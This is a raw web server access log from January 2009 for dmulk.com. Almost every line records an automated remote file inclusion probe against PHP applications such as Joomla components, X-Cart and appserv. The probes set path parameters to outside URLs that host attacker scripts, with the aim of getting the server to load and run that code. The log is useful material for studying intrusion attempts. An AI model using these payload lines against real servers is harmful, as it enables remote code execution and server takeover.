121.170.11.100 - - [04/Jan/2009:08:07:31 -0800] "GET //admin/index.php?o=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.170.11.100 - - [04/Jan/2009:08:07:32 -0800] "GET /logs///admin/index.php?o=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.191.227.90 - - [04/Jan/2009:08:07:51 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
212.67.202.153 - - [04/Jan/2009:08:07:52 -0800] "GET /logs/access_080313.log/?sourcedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
207.191.227.90 - - [04/Jan/2009:08:07:52 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
89.218.85.18 - - [04/Jan/2009:08:07:58 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://h1.ripway.com/finger/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.170.11.100 - - [04/Jan/2009:08:08:32 -0800] "GET /logs/access_080128.log///akocomments.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:08:33 -0800] "GET //appserv/main.php?appserv_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.67.202.153 - - [04/Jan/2009:08:08:39 -0800] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.153 - - [04/Jan/2009:08:08:40 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.153 - - [04/Jan/2009:08:08:40 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:08:48 -0800] "GET /logs/access_081207.log//modules/Forums/admin/errors.php?error=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:08:54 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.55.139.190 - - [04/Jan/2009:08:08:54 -0800] "GET /config/dbutil.bck.php?confdir=http://www.arhi-house.ru/htaccess.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:09:10 -0800] "GET /logs/phphtml.php?htmlclass_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:09:10 -0800] "GET /phphtml.php?htmlclass_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:09:12 -0800] "GET /logs/phphtml.php?htmlclass_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:09:12 -0800] "GET /phphtml.php?htmlclass_path=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:08:09:15 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:08:09:15 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.235.245.121 - - [04/Jan/2009:08:09:15 -0800] "GET /logs/access_081202.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.249.73.140 - - [04/Jan/2009:08:09:15 -0800] "GET /blog/wp-content/gallery/occ-hondas-2008/d68d_1.jpg HTTP/1.1" 200 20783 "-" "Googlebot-Image/1.0" "dmulk.com"
87.234.201.76 - - [04/Jan/2009:08:09:17 -0800] "GET /logs/access_080409.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:09:22 -0800] "GET /logs/access_080505.log///appserv/main.php?appserv_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:09:22 -0800] "GET //appserv/main.php?appserv_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:09:23 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:09:23 -0800] "GET /logs/access_080401.log///appserv/main.php?appserv_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.67.202.153 - - [04/Jan/2009:08:09:33 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
70.87.63.234 - - [04/Jan/2009:08:09:36 -0800] "GET /logs/access_081118.log%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.hassenrasool.com/shop/bod.do???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.170.11.100 - - [04/Jan/2009:08:09:44 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.170.11.100 - - [04/Jan/2009:08:09:50 -0800] "GET /logs/access_080507.log///admin/index.php?o=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.18.127 - - [04/Jan/2009:08:10:00 -0800] "GET /logs//modules/Manufacturers/customer_manufacturers.php?xcart_dir=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
218.234.18.127 - - [04/Jan/2009:08:10:01 -0800] "GET /modules/Manufacturers/customer_manufacturers.php?xcart_dir=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:10:11 -0800] "GET /logs/access_080312.log///admin/index.php?o=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:10:11 -0800] "GET //admin/index.php?o=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:10:11 -0800] "GET /logs///admin/index.php?o=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.195.185.194 - - [04/Jan/2009:08:10:19 -0800] "GET /logs/access_080703.log///administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.1.112 - - [04/Jan/2009:08:10:34 -0800] "GET /logs//register.php/config.php?xcart_dir=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
216.246.1.112 - - [04/Jan/2009:08:10:34 -0800] "GET /register.php/config.php?xcart_dir=http://www.csjh.tpc.edu.tw/~sw/board/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:10:46 -0800] "GET /logs/access_080810.log///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:10:46 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:10:47 -0800] "GET /logs///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:11:13 -0800] "GET /logs///administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:11:14 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.96.156.74 - - [04/Jan/2009:08:11:19 -0800] "GET /logs/access_081206.log/?_shop_path=http://www.leegolf.com/vboard/data/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
222.96.156.74 - - [04/Jan/2009:08:11:19 -0800] "GET /logs/?_shop_path=http://www.leegolf.com/vboard/data/tukulid.txt?? HTTP/1.1" 200 80886 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
222.96.156.74 - - [04/Jan/2009:08:11:20 -0800] "GET /?_shop_path=http://www.leegolf.com/vboard/data/tukulid.txt?? HTTP/1.1" 200 94791 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
81.176.232.101 - - [04/Jan/2009:08:11:26 -0800] "GET /logs/access_080425.log///administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.233.166.227 - - [04/Jan/2009:08:11:31 -0800] "GET /logs/access_080507.log///admin/index.php?o=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.176.226.164 - - [04/Jan/2009:08:12:15 -0800] "GET /logs/access_080524.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
81.176.226.164 - - [04/Jan/2009:08:12:15 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
81.176.226.164 - - [04/Jan/2009:08:12:15 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
85.214.53.78 - - [04/Jan/2009:08:12:18 -0800] "GET //announcements.php?phpraid_dir=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.176.226.164 - - [04/Jan/2009:08:12:22 -0800] "GET /logs/access_080301.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
64.128.80.16 - - [04/Jan/2009:08:12:28 -0800] "GET /logs/access_081114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://maxhost.org/scripts/v7id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:12:29 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:12:29 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:12:44 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.36.39.203 - - [04/Jan/2009:08:12:44 -0800] "GET /logs///administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.2 - - [04/Jan/2009:08:12:45 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://necis-a.biz/aank/keren.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.16 - - [04/Jan/2009:08:12:57 -0800] "GET /?_shop_path=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 200 94721 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.155 - - [04/Jan/2009:08:13:00 -0800] "GET /logs/access_080629.log%20/einstellungen.inc.php?cm_ext_server=http://www.salvationthroughgrace.com/Ephesians/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.67.202.153 - - [04/Jan/2009:08:13:08 -0800] "GET /logs/?sourcedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 200 80886 "-" "libwww-perl/5.68" "www.dmulk.com"
212.67.202.153 - - [04/Jan/2009:08:13:10 -0800] "GET /?sourcedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 200 94740 "-" "libwww-perl/5.68" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:13:23 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:13:23 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:13:23 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:13:24 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:13:24 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.214.201 - - [04/Jan/2009:08:13:24 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.13.108 - - [04/Jan/2009:08:13:26 -0800] "GET /logs/access_071103.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
218.38.13.108 - - [04/Jan/2009:08:13:26 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
218.38.13.108 - - [04/Jan/2009:08:13:26 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
218.38.13.108 - - [04/Jan/2009:08:13:26 -0800] "GET /logs/access_071125.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://spass.huneck.eu/id/idfeelcomz.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:13:27 -0800] "GET /logs/access_071218.log/modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.153.214.235 - - [04/Jan/2009:08:13:28 -0800] "GET /logs/saveserver.php?thisdir=http://rostrum56.ingeraldton.com/mutcp/read.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.153.214.235 - - [04/Jan/2009:08:13:28 -0800] "GET /saveserver.php?thisdir=http://rostrum56.ingeraldton.com/mutcp/read.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.153.214.235 - - [04/Jan/2009:08:13:28 -0800] "GET /logs/access_080509.log/saveserver.php?thisdir=http://rostrum56.ingeraldton.com/mutcp/read.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:13:30 -0800] "GET /logs/access_080524.log///atom.php5?page=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:13:30 -0800] "GET //atom.php5?page=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:13:31 -0800] "GET /modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:13:31 -0800] "GET /logs///atom.php5?page=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.153.214.235 - - [04/Jan/2009:08:13:32 -0800] "GET /logs/access_080505.log/saveserver.php?thisdir=http://rostrum56.ingeraldton.com/mutcp/read.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.32.59.216 - - [04/Jan/2009:08:13:35 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:13:45 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.23.200 - - [04/Jan/2009:08:13:46 -0800] "GET //appserv/main.php?appserv_root=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.41.90.11 - - [04/Jan/2009:08:13:50 -0800] "GET /logs/access_080529.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.dmulk.com"
200.160.96.54 - - [04/Jan/2009:08:13:53 -0800] "GET /logs/access_071216.log/modules/tinycontent//admin/spaw/spaw_control.class.php?spaw_root=http://secure.burtonhosting.com/billing//include/reports/include/ooid.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.214.79.241 - - [04/Jan/2009:08:14:02 -0800] "GET /logs/access_080513.log/?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
85.214.79.241 - - [04/Jan/2009:08:14:02 -0800] "GET /logs/?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 200 80886 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
85.214.79.241 - - [04/Jan/2009:08:14:03 -0800] "GET /?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 200 94784 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
85.214.79.241 - - [04/Jan/2009:08:14:11 -0800] "GET /logs/access_080201.log/?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
77.222.40.154 - - [04/Jan/2009:08:14:12 -0800] "GET /logs/access_080404.log///atom.php5?page=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
60.248.66.134 - - [04/Jan/2009:08:14:18 -0800] "GET /logs/access_080504.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.817" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:14:19 -0800] "GET /logs/access_080407.log/upgrade.php?admindir=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
60.248.66.134 - - [04/Jan/2009:08:14:19 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.817" "www.dmulk.com"
60.248.66.134 - - [04/Jan/2009:08:14:19 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.alternativesud.com/ressources/cms/modules/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.817" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:14:20 -0800] "GET /upgrade.php?admindir=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:14:21 -0800] "GET /logs/upgrade.php?admindir=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.54.154.10 - - [04/Jan/2009:08:14:23 -0800] "GET /logs/access_080407.log/upgrade.php?admindir=http://www.spokanite.com/1chat-board/images/avatars/gallery/General/prc.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
